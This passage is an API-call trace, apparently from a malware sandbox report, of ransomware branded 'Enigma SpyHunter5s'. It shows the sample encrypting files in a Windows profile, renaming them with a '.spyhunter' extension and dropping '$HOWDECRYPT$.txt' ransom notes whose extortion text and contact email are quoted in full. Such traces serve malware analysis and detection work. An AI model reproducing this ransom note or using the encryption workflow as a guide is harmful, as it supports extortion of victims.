returned 1 [0143.590] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0143.590] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cefec, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cefec*=0x2ac, lpOverlapped=0x0) returned 1 [0143.590] CloseHandle (hObject=0x178) returned 1 [0143.590] GetProcessHeap () returned 0x2c0000 [0143.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cea8 | out: hHeap=0x2c0000) returned 1 [0143.590] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cef88 | out: pbBuffer=0x25cef88) returned 1 [0143.590] GetProcessHeap () returned 0x2c0000 [0143.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0143.590] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cef80*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cef80*=0x30) returned 1 [0143.591] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0143.591] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk") returned 118 [0143.591] StrStrW (lpFirst="Windows Explorer.lnk", lpSrch=".txt") returned 0x0 [0143.591] GetProcessHeap () returned 0x2c0000 [0143.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0143.591] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cef44, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cef44*=0x4cc, lpOverlapped=0x0) returned 1 [0143.613] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffb34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.613] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x4cc, lpNumberOfBytesWritten=0x25cef44, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cef44*=0x4cc, lpOverlapped=0x0) returned 1 [0143.613] GetProcessHeap () returned 0x2c0000 [0143.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0143.613] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.613] WriteFile (in: hFile=0x178, lpBuffer=0x25cef84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cef44, lpOverlapped=0x0 | out: lpBuffer=0x25cef84*, lpNumberOfBytesWritten=0x25cef44*=0x4, lpOverlapped=0x0) returned 1 [0143.614] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cef44, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cef44*=0x30, lpOverlapped=0x0) returned 1 [0143.614] CloseHandle (hObject=0x178) returned 1 [0143.614] GetProcessHeap () returned 0x2c0000 [0143.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0143.614] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk.spyhunter") returned 128 [0143.614] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk.spyhunter" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk.spyhunter")) returned 1 [0143.615] GetProcessHeap () returned 0x2c0000 [0143.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0143.615] GetProcessHeap () returned 0x2c0000 [0143.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0143.615] GetProcessHeap () returned 0x2c0000 [0143.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd70 | out: hHeap=0x2c0000) returned 1 [0143.615] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cef88 | out: pbBuffer=0x25cef88) returned 1 [0143.615] GetProcessHeap () returned 0x2c0000 [0143.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0143.615] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cef80*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cef80*=0x30) returned 1 [0143.615] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0143.616] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini") returned 109 [0143.616] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0143.616] GetProcessHeap () returned 0x2c0000 [0143.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0143.616] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cef44, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cef44*=0xd3, lpOverlapped=0x0) returned 1 [0143.617] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff2d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.617] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xd3, lpNumberOfBytesWritten=0x25cef44, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cef44*=0xd3, lpOverlapped=0x0) returned 1 [0143.617] GetProcessHeap () returned 0x2c0000 [0143.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0143.617] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.617] WriteFile (in: hFile=0x178, lpBuffer=0x25cef84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cef44, lpOverlapped=0x0 | out: lpBuffer=0x25cef84*, lpNumberOfBytesWritten=0x25cef44*=0x4, lpOverlapped=0x0) returned 1 [0143.617] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cef44, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cef44*=0x30, lpOverlapped=0x0) returned 1 [0143.617] CloseHandle (hObject=0x178) returned 1 [0143.617] GetProcessHeap () returned 0x2c0000 [0143.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0143.618] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini.spyhunter") returned 119 [0143.618] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini.spyhunter" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini.spyhunter")) returned 1 [0143.618] GetProcessHeap () returned 0x2c0000 [0143.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0143.619] GetProcessHeap () returned 0x2c0000 [0143.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0143.619] GetProcessHeap () returned 0x2c0000 [0143.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffb060 | out: hHeap=0x2c0000) returned 1 [0143.619] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cef80 | out: pbBuffer=0x25cef80) returned 1 [0143.619] GetProcessHeap () returned 0x2c0000 [0143.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0143.619] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cef78*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cef78*=0x30) returned 1 [0143.619] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\.." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.619] GetProcessHeap () returned 0x2c0000 [0143.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0143.619] GetProcessHeap () returned 0x2c0000 [0143.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f69a50 | out: hHeap=0x2c0000) returned 1 [0143.619] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cef80 | out: pbBuffer=0x25cef80) returned 1 [0143.619] GetProcessHeap () returned 0x2c0000 [0143.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0143.619] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cef78*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cef78*=0x30) returned 1 [0143.619] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.620] GetProcessHeap () returned 0x2c0000 [0143.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0143.620] GetProcessHeap () returned 0x2c0000 [0143.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f69938 | out: hHeap=0x2c0000) returned 1 [0143.620] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\implicitappshortcuts\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0143.620] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0143.642] WriteFile (in: hFile=0x178, lpBuffer=0x25ceeaf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cefd8, lpOverlapped=0x0 | out: lpBuffer=0x25ceeaf*, lpNumberOfBytesWritten=0x25cefd8*=0x127, lpOverlapped=0x0) returned 1 [0143.643] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0143.643] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cefd8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cefd8*=0x2ac, lpOverlapped=0x0) returned 1 [0143.643] CloseHandle (hObject=0x178) returned 1 [0143.643] GetProcessHeap () returned 0x2c0000 [0143.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f04678 | out: hHeap=0x2c0000) returned 1 [0143.644] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cef78 | out: pbBuffer=0x25cef78) returned 1 [0143.644] GetProcessHeap () returned 0x2c0000 [0143.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0143.644] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cef70*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cef70*=0x30) returned 1 [0143.644] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\.." (normalized: "c:\\users\\default\\appdata\\roaming"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.644] GetProcessHeap () returned 0x2c0000 [0143.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0143.644] GetProcessHeap () returned 0x2c0000 [0143.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec0350 | out: hHeap=0x2c0000) returned 1 [0143.644] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cef70 | out: pbBuffer=0x25cef70) returned 1 [0143.644] GetProcessHeap () returned 0x2c0000 [0143.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0143.644] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cef68*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cef68*=0x30) returned 1 [0143.644] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.644] GetProcessHeap () returned 0x2c0000 [0143.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0143.644] GetProcessHeap () returned 0x2c0000 [0143.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec0140 | out: hHeap=0x2c0000) returned 1 [0143.645] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cef70 | out: pbBuffer=0x25cef70) returned 1 [0143.645] GetProcessHeap () returned 0x2c0000 [0143.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0143.645] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cef68*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cef68*=0x30) returned 1 [0143.645] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\.." (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.645] GetProcessHeap () returned 0x2c0000 [0143.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0143.645] GetProcessHeap () returned 0x2c0000 [0143.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f31e80 | out: hHeap=0x2c0000) returned 1 [0143.645] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cef68 | out: pbBuffer=0x25cef68) returned 1 [0143.645] GetProcessHeap () returned 0x2c0000 [0143.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0143.645] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cef60*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cef60*=0x30) returned 1 [0143.645] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\." (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.645] GetProcessHeap () returned 0x2c0000 [0143.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0143.645] GetProcessHeap () returned 0x2c0000 [0143.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff7d68 | out: hHeap=0x2c0000) returned 1 [0143.646] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0143.685] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0143.685] WriteFile (in: hFile=0x178, lpBuffer=0x25cee9b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cefc4, lpOverlapped=0x0 | out: lpBuffer=0x25cee9b*, lpNumberOfBytesWritten=0x25cefc4*=0x127, lpOverlapped=0x0) returned 1 [0143.686] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0143.686] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cefc4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cefc4*=0x2ac, lpOverlapped=0x0) returned 1 [0143.951] CloseHandle (hObject=0x178) returned 1 [0143.951] GetProcessHeap () returned 0x2c0000 [0143.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f00238 | out: hHeap=0x2c0000) returned 1 [0143.951] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cef60 | out: pbBuffer=0x25cef60) returned 1 [0143.951] GetProcessHeap () returned 0x2c0000 [0143.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0143.951] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cef58*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cef58*=0x30) returned 1 [0143.952] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\shades of blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0143.969] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm") returned 87 [0143.970] StrStrW (lpFirst="Shades of Blue.htm", lpSrch=".txt") returned 0x0 [0143.970] GetProcessHeap () returned 0x2c0000 [0143.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0143.970] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cef1c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cef1c*=0xed, lpOverlapped=0x0) returned 1 [0143.971] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff13, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.971] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x25cef1c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cef1c*=0xed, lpOverlapped=0x0) returned 1 [0143.971] GetProcessHeap () returned 0x2c0000 [0143.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0143.971] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.971] WriteFile (in: hFile=0x178, lpBuffer=0x25cef5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cef1c, lpOverlapped=0x0 | out: lpBuffer=0x25cef5c*, lpNumberOfBytesWritten=0x25cef1c*=0x4, lpOverlapped=0x0) returned 1 [0143.971] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cef1c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cef1c*=0x30, lpOverlapped=0x0) returned 1 [0143.971] CloseHandle (hObject=0x178) returned 1 [0143.971] GetProcessHeap () returned 0x2c0000 [0143.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0143.972] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm.spyhunter") 